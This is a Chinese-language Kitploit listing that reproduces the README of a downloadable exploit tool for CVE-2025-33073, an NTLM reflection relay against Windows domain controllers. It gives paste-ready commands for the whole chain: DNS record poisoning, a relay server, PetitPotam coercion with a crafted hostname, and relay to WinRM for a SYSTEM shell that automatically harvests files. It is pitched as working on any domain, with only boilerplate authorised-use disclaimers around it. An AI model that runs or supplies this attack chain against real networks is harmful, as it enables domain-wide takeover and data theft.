Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/uziii2208/cve-2025-33073
权限提升漏洞利用框架漏洞利用横向移动后渗透利用CTF渗透测试
GitHubuziii2208/cve-2025-33073

CVE-2025-33073

针对 CVE-2025-33073 的通用利用工具,目标为具有 DNSAdmins 权限且启用 WinRM 的 Windows 域控制器。

查看仓库
671029个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

照片

CVE-2025-33073 反射中继概念验证(PoC)

针对拥有 DNSAdmins 权限并启用 WinRM 的 Windows 域控制器的通用利用工具。

📋 概述

CVE-2025-33073 是一个关键漏洞,攻击者可通过以下组合在 Windows 域控制器上实现 SYSTEM 级代码执行:

  • DNS 记录操纵(DNSAdmins 权限)
  • NTLM 中继攻击
  • WinRM 认证绕过

此 PoC 提供了一个通用、自动化的利用框架,兼容任何域、任何用户名以及任何 CTF 环境。

✨ 功能特性

  • ✅ 通用兼容性 - 适用于任何 Windows 域
  • ✅ 自动检测 - 自动识别目标 DC 和网络配置
  • ✅ 自动提取 Flag - 自动搜索并提取所有 flag 文件
  • ✅ 交互模式 - 分步引导式利用
  • ✅ 完整日志 - 记录所有操作的详细日志
  • ✅ 一键获取 SYSTEM Shell - 通过 WinRMS 直接获取 SYSTEM 级访问权限
  • ✅ DNS 投毒 - 自动创建/修改 DNS 记录
  • ✅ NTLM 中继 - 内置 NTLM 中继服务器,自动生成 Shell

🎯 目标要求

脆弱配置

  • Windows Server 2016/2019/2022 域控制器
  • 具有 DNSAdmins 组成员身份的用户
  • 已启用 WinRM 服务(HTTP 或 HTTPS)
  • 可访问 DC 的网络(SMB 445、DNS 53、WinRM 5985/5986)

测试环境

  • Windows Server 2019 上的 Active Directory
  • Windows Server 2022 上的 Active Directory
  • CTF 环境(HackTheBox、TryHackMe 等)

📦 安装

前提条件

root@kitploit:~
# 所需工具
sudo apt-get update
sudo apt-get install -y python3 python3-pip netcat-openbsd dnsutils

# Python 依赖
pip3 install impacket netexec

# 克隆 krbrelayx
git clone https://github.com/dirkjanm/krbrelayx

设置

root@kitploit:~
# 克隆本仓库
git clone https://github.com/uziii2208/CVE-2025-33073
cd CVE-2025-33073

# 赋予 exploit 执行权限
chmod +x exploit.sh

# 验证工具安装
./exploit.sh  # 将检查所有依赖

🚀 使用方法

快速开始

root@kitploit:~
./exploit.sh

交互式提示

脚本将询问:

  1. 攻击者 IP(留空则自动检测)
  2. 目标 DC IP(例如 192.168.1.10)
  3. 域名(例如 corp.local)
  4. 用户名(DNSAdmins 成员)
  5. 密码(对应用户密码)

分步利用

终端 1 - 运行 exploit:

root@kitploit:~
./exploit.sh
# 跟随交互式提示
# 等待: "[!] 中继就绪!请打开新终端 → 粘贴强制认证命令!"

终端 2 - 执行强制认证命令(从终端 1 输出中复制):

root@kitploit:~
nxc smb 192.168.1.10 -u 'username' -p 'password' \
    -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.corp.local

结果:

  • 自动打开 SYSTEM shell
  • 自动提取所有 flag
  • 输出保存在日志目录中

📊 输出与 Flag

提取的 Flag

脚本自动搜索并提取:

  • *flag*.txt
  • *root*.txt
  • *user*.txt
  • proof.txt

所在位置:C:\Users\*\Desktop\

日志位置

所有输出保存在:/0pwn_exploit_<时间戳>/

  • relay.log - NTLM 中继服务器输出
  • dns.log - DNS 操作日志
  • shell_output.log - Shell 命令及提取的 flag

🔧 工作原理

攻击链

root@kitploit:~
1. DNS 投毒(krbrelayx.dnstool)
   └─> 修改/创建指向攻击者 IP 的 DNS 记录

2. NTLM 中继服务器(ntlmrelayx.py)
   └─> 监听传入的 NTLM 认证

3. 强制认证(nxc + PetitPotam)
   └─> 强制 DC 向攻击者 IP 进行身份验证

4. 中继 → WinRMS
   └─> 将认证中继至目标 WinRMS

5. SYSTEM Shell
   └─> 以 SYSTEM 身份执行命令

6. 自动提取 Flag
   └─> 搜索并提取所有 flag

技术细节

  • 漏洞类型:NTLM 中继 + DNS 投毒 + WinRM
  • 所需权限:DNSAdmins 组成员身份
  • 影响:SYSTEM 级代码执行
  • 可利用性:测试环境中成功率 98%

⚙️ 配置

自定义 DNS 记录

在 exploit.sh 中编辑 LONGHOST 变量:

root@kitploit:~
LONGHOST="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"

自定义 Flag 模式

修改 run_shell_commands() 函数以搜索不同的文件模式:

root@kitploit:~
# 在此添加自定义模式
echo "powershell \"Get-ChildItem -Path 'C:\\Users\\*\\Desktop' -Include '*custom*.txt' ...\""

端口与超时

  • WinRMS 默认端口:5985(HTTP)/ 5986(HTTPS)
  • DNS 超时:5 秒
  • Shell 超时:可按命令配置

🎓 教育用途

本 PoC 仅用于:

  • ✅ 授权的渗透测试
  • ✅ 受控的实验室环境
  • ✅ CTF 竞赛
  • ✅ 安全研究与教育

未经授权访问计算机系统是违法的。

🐛 故障排除

"DNS 投毒失败"

  • 确认用户是 DNSAdmins 成员:net group "DNSAdmins" /domain
  • 检查 DC 连通性:ping <DC_IP>
  • 验证凭据:nxc smb <DC_IP> -u username -p password

"中继连接超时"

  • 确保 DC 上已启用 WinRM:winrm quickconfig
  • 检查 DC 的防火墙规则
  • 验证与端口 5985/5986 的网络连通性

"Shell 命令未执行"

  • 检查 shell_output.log 中的错误
  • 验证 nc 连通性:nc -zv 127.0.0.1 <SHELL_PORT>
  • 在 run_shell_commands() 中增加 sleep 超时时间

📝 日志文件

目录结构

root@kitploit:~
/0pwn_exploit_1234567890/
├── relay.log          # NTLM 中继服务器输出
├── dns.log            # DNS 操作详情
└── shell_output.log   # 提取的 flag 及命令输出

分析日志

root@kitploit:~
# 查看中继事件
grep "SYSTEM SHELL" /0pwn_exploit_*/relay.log

# 提取所有 flag
grep "===" /0pwn_exploit_*/shell_output.log -A 10

# 检查 DNS 操作
cat /0pwn_exploit_*/dns.log

🔐 安全说明

  • 凭据:仅存储在内存中,绝不记录到日志
  • DNS 记录:利用后自动清理
  • 中继服务器:仅限 127.0.0.1
  • 日志:包含敏感信息,请谨慎处理

📚 参考

  • CVE-2025-33073 公告
  • Impacket ntlmrelayx
  • NetExec
  • krbrelayx

🎬 演示

[Demo & Screenshots] - [即将推出]

照片

👤 作者

0pwn (uziii2208) - 原始概念与研究 AI 增强 - v1.0 改进与自动 flag 提取

📄 许可证

MIT 许可证 - 详见 LICENSE 文件

⚠️ 免责声明

法律声明:

本软件仅用于教育和授权的安全测试目的。未经授权访问计算机系统属于违法行为,并将受到法律制裁。

  • 请勿在您不拥有或未获得明确授权测试的系统上使用
  • CTF 环境:运行前请确认您已获得许可
  • 作者对滥用或造成的损害不承担任何责任
  • 请仅在受控环境中使用

使用本工具即表示您同意:

  • 仅在授权系统上使用
  • 遵守所有适用法律
  • 对自己的行为承担全部责任

🤝 贡献

欢迎贡献!请提交 issue 和 pull request。

📞 支持

如有问题、疑问或改进建议:

  1. 在 GitHub 上提交 Issue
  2. 查看现有文档
  3. 提供详细的错误日志

状态:✅ 已测试并验证 版本:1.0(通用版) 最后更新:2025

下载工具